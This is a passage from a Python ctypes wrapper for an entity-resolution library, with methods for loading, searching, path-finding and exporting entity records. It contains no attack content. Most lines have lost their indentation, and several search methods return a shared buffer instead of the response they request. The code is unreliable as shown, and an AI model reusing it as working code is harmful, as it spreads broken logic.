self._lib_handle.G2_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_getLastExceptionCode.restype = c_int
self._lib_handle.G2_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2_getLastExceptionCode()
return exception_code
def process(self, input_umf_):
# type: (str) -> None
""" Generic process function without return
This method will send a record for processing in g2.
Args:
record: An input record to be processed. Contains the data and control info.
Return:
None
"""
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
            input_umf_string = bytes(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
self._lib_handle.G2_process.argtypes = [c_char_p]
self._lib_handle.G2_process.restype = c_int
ret_code = self._lib_handle.G2_process(input_umf_string)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
def processWithResponse(self, input_umf_):
""" Generic process function that returns results
This method will send a record for processing in g2. It is a synchronous
call, i.e. it will wait until g2 actually processes the record, and then
optionally return any response message.
Args:
record: An input record to be processed. Contains the data and control info.
response: If there is a response to the message it will be returned here.
Note there are performance benefits of calling the process method
that doesn't need a response message.
Return:
str: The response in G2 JSON format.
"""
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
            input_umf_string = bytes(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_processWithResponseResize.argtypes = [c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_processWithResponseResize(input_umf_string,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def checkRecord(self, input_umf_, recordQueryList):
        # type: (str,str) -> str
        """ Scores the input record against the specified records
        Args:
            input_umf_: A JSON document containing the attribute information
                for the observation.
            recordQueryList: A JSON document listing the records to score against.
        Return:
            str: The response in G2 JSON format.
        """
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
            input_umf_string = bytes(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_checkRecord.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
        ret_code = self._lib_handle.G2_checkRecord(input_umf_string,
                                                   self.prepareStringArgument(recordQueryList),
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def getExportFlagsForMaxMatchLevel(self, max_match_level, includeSingletons, includeExtraCols):
""" Converts a maximum match level into an appropriate export flag bitmask value.
Args:
max_match_level: The maximum match level to use in an export.
includeSingletons: Also include singletons.
includeExtraCols: Also include extra export output.
Return:
int: A bitmask flag representing the match-levels to include.
"""
g2ExportFlags = 0
if max_match_level == 1:
# Include resolved entities
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED
elif max_match_level == 2:
# Include possibly same relationships in addition to resolved entities
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME
elif max_match_level == 3:
# Include possibly related relationships in addition to resolved entities & possibly same
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED
elif max_match_level == 4:
# Include name-only relationships in addition to resolved entities & possibly same & possibly related
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED | self.G2_EXPORT_INCLUDE_NAME_ONLY
elif max_match_level == 5:
# Include disclosed relationships in addition to resolved entities & possibly same & possibly related & name-only
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED | self.G2_EXPORT_INCLUDE_NAME_ONLY | self.G2_EXPORT_INCLUDE_DISCLOSED
else:
g2ExportFlags = self.G2_EXPORT_INCLUDE_ALL_ENTITIES
#Add 1 to flags if we are including singletons
if includeSingletons:
g2ExportFlags = g2ExportFlags | self.G2_EXPORT_INCLUDE_ALL_ENTITIES
#Add 2 to flags if we are including extra header columns
if includeExtraCols:
g2ExportFlags = g2ExportFlags | self.G2_EXPORT_CSV_INCLUDE_FULL_DETAILS
return g2ExportFlags
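    # Worked example (values follow the bit definitions above):
    #   getExportFlagsForMaxMatchLevel(2, True, False)
    #   == G2_EXPORT_INCLUDE_RESOLVED | G2_EXPORT_INCLUDE_POSSIBLY_SAME
    #      | G2_EXPORT_INCLUDE_ALL_ENTITIES
    #   == 4 | 8 | 1 == 13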
def getExportHandleFromFlags(self, exportType, g2ExportFlags, colNames=None):
if exportType == 'CSV':
if colNames and isinstance(colNames, list):
colNames = ",".join(colNames)
self._lib_handle.G2_exportCSVEntityReport_V2.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport_V2.argtypes = [c_char_p, c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport_V2(colNames.encode(), g2ExportFlags)
else:
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport.argtypes = [c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport(g2ExportFlags)
else:
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
self._lib_handle.G2_exportJSONEntityReport.argtypes = [c_int]
exportHandle = self._lib_handle.G2_exportJSONEntityReport(g2ExportFlags)
return exportHandle
def getExportHandle(self, exportType, max_match_level):
# type: (str, int) -> c_void_p
""" Generate a CSV or JSON export
This is used to export entity data from known entities. This function
returns an export-handle that can be read from to get the export data
in the requested format. The export-handle should be read using the "G2_fetchNext"
function, and closed when work is complete. If CSV, the first output row returned
by the export-handle contains the CSV column headers as a string. Each
following row contains the exported entity data.
Args:
exportType: CSV or JSON
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships *** Internal only
5 -- "disclosed" relationships
Return:
c_void_p: handle for the export
"""
g2ExportFlags = self.getExportFlagsForMaxMatchLevel(max_match_level, True, True)
if exportType == 'CSV':
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportCSVEntityReport(g2ExportFlags)
else:
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportJSONEntityReport(g2ExportFlags)
return exportHandle
def fetchExportRecord(self, exportHandle):
# type: (c_void_p) -> str
""" Fetch a record from an export
Args:
exportHandle: handle from generated export
Returns:
str: Record fetched, empty if there is no more data
"""
resultString = ""
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
resultString += tls_var.buf.value.decode('utf-8')
if resultString[-1] == '\n':
resultString = resultString[0:-1]
break
else:
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
return resultString
def fetchCsvExportRecord(self, exportHandle, csvHeaders = None):
        # type: (c_void_p, list) -> dict
""" Fetch a CSV record from an export
Args:
exportHandle: handle from generated export
csvHeaders: CSV header record
Returns:
dict: Record fetched using the csvHeaders as the keys.
None if no more data is available.
"""
resultString = self.fetchExportRecord(exportHandle)
if resultString:
csvRecord = next(csv.DictReader([resultString], fieldnames=csvHeaders))
else:
csvRecord = None
return csvRecord
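    # Illustrative CSV export loop: the first fetched row holds the column
    # headers, and subsequent rows come back as dicts keyed by those headers:
    #   handle = g2.getExportHandle('CSV', 3)
    #   headers = g2.fetchExportRecord(handle).split(',')
    #   row = g2.fetchCsvExportRecord(handle, headers)
    #   while row is not None:
    #       ...  # use the dict
    #       row = g2.fetchCsvExportRecord(handle, headers)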
def exportCSVEntityReport(self, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
        # type: (int, int, bool, bool) -> tuple
""" Generate a CSV Entity Report
        This is used to export entity data from known entities. This function
        reads the entire export internally and returns the CSV document as a
        string, together with the number of rows fetched. Each output row
        contains the exported entity data for a single resolved entity.
Args:
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships *** Internal only
5 -- "disclosed" relationships
g2ExportFlags: A bit mask specifying other control flags, such as
"G2_EXPORT_INCLUDE_SINGLETONS". The default and recommended
value is "G2_EXPORT_DEFAULT_FLAGS".
includeSingletons: Also include singletons
includeExtraCols: Also include extra export output
        Return:
            tuple: (the CSV document as a string, the number of rows fetched)
        """
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportCSVEntityReport(fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
def exportCSVEntityReportV2(self, csvColumnList, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
        # type: (str, int, int, bool, bool) -> tuple
""" Generate a CSV Entity Report
This is used to export entity data from known entities
"""
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
_csvColumnList = self.prepareStringArgument(csvColumnList)
self._lib_handle.G2_exportCSVEntityReport_V2.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport_V2.argtypes = [c_char_p, c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport_V2(_csvColumnList,fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
def exportJSONEntityReport(self, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
        # type: (int, int, bool, bool) -> tuple
""" Generate a JSON Entity Report
        This is used to export entity data from known entities. This function
        reads the entire export internally and returns the JSON document as a
        string, together with the number of rows fetched. Each output row
        contains the exported entity data for a single resolved entity.
Args:
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships
5 -- "disclosed" relationships
g2ExportFlags: A bit mask specifying other control flags, such as
"G2_EXPORT_INCLUDE_SINGLETONS". The default and recommended
value is "G2_EXPORT_DEFAULT_FLAGS".
includeSingletons: Also include singletons
includeExtraCols: Also include extra export output
        Return:
            tuple: (the JSON document as a string, the number of rows fetched)
        """
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportJSONEntityReport(fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
    def prepareStringArgument(self, stringToPrepare):
        # type: (str) -> bytes
        """ Internal processing function """
        if stringToPrepare is None:
            return None
        # if the input is a str, transcode it to utf-8 bytes
        if type(stringToPrepare) == str:
            return stringToPrepare.encode('utf-8')
        # if the input is a bytearray, assume utf-8 and convert it to bytes
        elif type(stringToPrepare) == bytearray:
            return bytes(stringToPrepare)
        # input is already bytes
        return stringToPrepare
def addRecord(self,dataSourceCode,recordId,jsonData,loadId=None):
# type: (str,str,str,str) -> int
""" Loads the JSON record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
jsonData: A JSON document containing the attribute information
for the observation.
loadID: The observation load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_addRecord(_dataSourceCode,_recordId,_jsonData,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
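    # Illustrative call (the data source code, record ID and JSON are made up):
    #   g2.addRecord('CUSTOMERS', '1001',
    #                '{"NAME_FULL": "Jane Smith", "PHONE_NUMBER": "702-555-1212"}')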
def replaceRecord(self,dataSourceCode,recordId,jsonData,loadId=None):
# type: (str,str,str,str) -> int
""" Replace the JSON record, loads if doesn't exist
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
jsonData: A JSON document containing the attribute information
for the observation.
loadID: The load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_replaceRecord(_dataSourceCode,_recordId,_jsonData,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def deleteRecord(self,dataSourceCode,recordId,loadId=None):
# type: (str,str,str) -> int
""" Delete the record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
loadID: The load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_deleteRecord(_dataSourceCode,_recordId,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def reevaluateRecord(self,dataSourceCode,recordId,flags):
# type: (str,str,int) -> int
""" Reevaluate the JSON record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: Bitwise control flags
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_reevaluateRecord(_dataSourceCode,_recordId,flags)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def reevaluateEntity(self,entityID,flags):
# type: (int,int) -> int
""" Reevaluate the JSON record
Args:
entityID: The entity ID to reevaluate.
flags: Bitwise control flags
Return:
int: 0 on success
"""
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_reevaluateEntity(entityID,flags)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def searchByAttributes(self,jsonData):
# type: (str) -> str
""" Find records matching the provided attributes
Args:
jsonData: A JSON document containing the attribute information to search.
Return:
str: JSON document with results
"""
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_searchByAttributes.argtypes = [c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_searchByAttributes(_jsonData,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def searchByAttributesV2(self,jsonData,flags):
        # type: (str, int) -> str
""" Find records matching the provided attributes
Args:
jsonData: A JSON document containing the attribute information to search.
flags: control flags.
Return:
str: JSON document with results
"""
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_searchByAttributes_V2.restype = c_int
self._lib_handle.G2_searchByAttributes_V2.argtypes = [c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_searchByAttributes_V2(_jsonData,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByEntityID(self,startEntityID,endEntityID,maxDegree):
        # type: (int, int, int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByEntityID.restype = c_int
self._lib_handle.G2_findPathByEntityID.argtypes = [c_longlong, c_longlong, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByEntityID(startEntityID,endEntityID,maxDegree,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByEntityIDV2(self,startEntityID,endEntityID,maxDegree,flags):
        # type: (int, int, int, int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
flags: control flags.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByEntityID_V2.restype = c_int
self._lib_handle.G2_findPathByEntityID_V2.argtypes = [c_longlong, c_longlong, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByEntityID_V2(startEntityID,endEntityID,maxDegree,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findNetworkByEntityID(self,entityList,maxDegree,buildOutDegree,maxEntities):
        # type: (str, int, int, int) -> str
""" Find a network between entities in the system.
Args:
entityList: The entities to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
Return:
str: JSON document with results
"""
_entityList = self.prepareStringArgument(entityList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByEntityID.restype = c_int
self._lib_handle.G2_findNetworkByEntityID.argtypes = [c_char_p, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByEntityID(_entityList,maxDegree,buildOutDegree,maxEntities,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findNetworkByEntityIDV2(self,entityList,maxDegree,buildOutDegree,maxEntities,flags):
        # type: (str, int, int, int, int) -> str
""" Find a network between entities in the system.
Args:
entityList: The entities to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
flags: control flags.
Return:
str: JSON document with results
"""
_entityList = self.prepareStringArgument(entityList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByEntityID_V2.restype = c_int
self._lib_handle.G2_findNetworkByEntityID_V2.argtypes = [c_char_p, c_int, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByEntityID_V2(_entityList,maxDegree,buildOutDegree,maxEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree):
        # type: (str, str, str, str, int) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByRecordID.restype = c_int
self._lib_handle.G2_findPathByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def findPathByRecordIDV2(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,flags):
        # type: (str, str, str, str, int, int) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
flags: control flags.
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByRecordID_V2.restype = c_int
self._lib_handle.G2_findPathByRecordID_V2.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByRecordID_V2(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def findNetworkByRecordID(self,recordList,maxDegree,buildOutDegree,maxEntities):
        # type: (str, int, int, int) -> str
""" Find a network between entities in the system.
Args:
recordList: The records to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
Return:
str: JSON document with results
"""
_recordList = self.prepareStringArgument(recordList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByRecordID.restype = c_int
self._lib_handle.G2_findNetworkByRecordID.argtypes = [c_char_p, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByRecordID(_recordList,maxDegree,buildOutDegree,maxEntities,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
            raise G2ModuleNotInitialized('G2Module has not been successfully initialized')
return responseBuf.value.decode('utf-8')
def findNetworkByRecordIDV2(self,recordList,maxDegree,buildOutDegree,maxEntities,flags):
        # type: (str, int, int, int, int) -> str
""" Find a network between entities in the system.
Args:
recordList: The records to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
flags: control flags.
Return:
str: JSON document with results
"""
_recordList = self.prepareStringArgument(recordList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByRecordID_V2.restype = c_int
self._lib_handle.G2_findNetworkByRecordID_V2.argtypes = [c_char_p, c_int, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByRecordID_V2(_recordList,maxDegree,buildOutDegree,maxEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findPathExcludingByEntityID(self,startEntityID,endEntityID,maxDegree,excludedEntities,flags):
        # type: (int,int,int,str,int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
flags: control flags
Return:
